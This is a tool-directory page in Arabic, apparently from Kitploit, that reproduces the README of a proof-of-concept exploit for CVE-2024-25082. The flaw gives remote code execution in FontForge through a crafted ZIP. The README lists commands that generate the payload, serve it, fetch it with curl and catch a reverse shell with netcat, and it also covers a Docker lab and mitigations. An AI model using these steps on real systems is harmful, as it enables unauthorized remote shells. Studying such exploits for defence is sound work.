Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-25082 — استغلال إثبات المفهوم لـ CVE-2024-25082، يوضح تنفيذ التعليمات البرمجية عن بعد في FontForge عبر أرشيفات ZIP مصممة. يتضمن مولّد حمولة ومختبر Docker وكتابة فنية للبحث الأمني والتعليم. | Kitploit
أدوات/GitHubGitHub/moamenx8/cve-2024-25082
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

استغلال إثبات المفهوم لـ CVE-2024-25082، يوضح تنفيذ التعليمات البرمجية عن بعد في FontForge عبر أرشيفات ZIP مصممة. يتضمن مولّد حمولة ومختبر Docker وكتابة فنية للبحث الأمني والتعليم.

عرض المستودع
5منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

⚠️ CVE-2024-25082 - تنفيذ التعليمات البرمجية عن بُعد عبر ZIP في FontForge (PoC)

License Python CVE

إثبات مفهوم لاستغلال CVE-2024-25082، وهي ثغرة تؤثر على FontForge وتتيح تنفيذ التعليمات البرمجية عن بُعد (RCE) من خلال أرشيف ZIP مصمم بعناية.

يُظهر هذا المستودع كيف يمكن استغلال الثغرة في بيئة مختبرية خاضعة للتحكم لأغراض البحث الأمني والتعليم.


نظرة عامة على الثغرة

  • معرف CVE: CVE-2024-25082\
  • البرنامج المتأثر: FontForge\
  • نوع الثغرة: تنفيذ التعليمات البرمجية عن بُعد\
  • ناقل الهجوم: أرشيف ZIP ضار\
  • الأثر: تنفيذ أوامر اعتباطية عند معالجة الأرشيف المصمم.

تحدث الثغرة بسبب عدم التحقق السليم من الملفات داخل أرشيفات ZIP، مما يسمح للمهاجم بتنفيذ أوامر اعتباطية على النظام المستهدف.


هيكل المستودع

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

الملف الوصف


exploit.py يولد الحمولة الضارة بصيغة ZIP poc/ يحتوي على ملفات إثبات المفهوم المُولَّدة writeup.md شرح تقني للثغرة


المتطلبات

  • Python 3.x
  • Netcat

تثبيت الأدوات الاختيارية:

root@kitploit:~
sudo apt install netcat

الاستخدام

1️⃣ توليد الحمولة الضارة

root@kitploit:~
python3 exploit.py --lhost <Your IP> --lport <Your Port>

سيؤدي هذا إلى إنشاء ملف exploit.zip ضار.


2️⃣ تقديم الاستغلال

root@kitploit:~
python3 -m http.server 8080

3️⃣ التحميل من النظام المستهدف

root@kitploit:~
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip

4️⃣ التقاط الصدفة العكسية

root@kitploit:~
nc -lvnp <Your Port>

في حال نجاح العملية، يجب الحصول على صدفة من النظام المستهدف.


إعادة إنتاج الثغرة

يتم توفير بيئة ضعيفة قابلة لإعادة الإنتاج داخل مجلد docker/.

مثال:

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

يتيح ذلك إجراء اختبار آمن دون التأثير على الأنظمة الإنتاجية.


الأثر الأمني

يمكن للمهاجم القادر على رفع أو التحكم في ملفات ZIP التي يعالجها التطبيق الضعيف أن:

  • تنفيذ أوامر اعتباطية على النظام
  • الوصول إلى صدفة عن بُعد
  • اختراق النظام المضيف

التخفيف

خطوات التخفيف الموصى بها:

  • تحديث FontForge إلى إصدار مصحح
  • التحقق من محتويات الأرشيفات المرفوعة
  • تقييد وظيفة رفع الملفات
  • استخدام العزل (sandbox) عند معالجة الخطوط

إخلاء المسؤولية

يحتوي هذا المستودع على رمز إثبات المفهوم لثغرة معلنة للعموم.

يُقدَّم الكود حصريًا للأغراض التالية:

  • البحث الأمني
  • الأغراض التعليمية
  • اختبار الاختراق المصرح به

لا تستخدم هذا الكود ضد أنظمة دون إذن صريح.

لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذا البرنامج.


المؤلف

Moamen Elmaghrabi

طالب في مجال الأمن السيبراني
اختبار الاختراق وتطوير الاستغلال


الترخيص

هذا المشروع مرخص بموجب رخصة MIT.
راجع ملف الترخيص للتفاصيل.

تنزيل الأداة